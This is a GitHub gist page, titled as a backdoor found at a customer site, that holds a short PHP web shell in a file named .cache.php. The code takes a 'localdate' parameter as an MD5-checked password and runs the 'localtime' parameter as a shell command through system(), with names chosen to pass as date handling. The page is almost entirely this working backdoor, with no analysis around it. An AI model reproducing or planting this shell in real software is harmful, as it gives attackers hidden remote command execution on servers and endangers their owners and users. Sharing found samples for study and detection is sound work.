Skip to content

Instantly share code, notes, and snippets.

@mostafahussein
Forked from jonaslejon/.cache.php
Created December 12, 2015 15:10
Show Gist options
  • Save mostafahussein/3fb8b3701506dc005235 to your computer and use it in GitHub Desktop.
Save mostafahussein/3fb8b3701506dc005235 to your computer and use it in GitHub Desktop.
Backdoor found at customer site
<?php
if (substr(md5($_GET["localdate"]),0,6) == "6fbcb8") {
$time = str_replace("@"," ",$_GET["localtime"]);
@system($time); exit;
}
?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment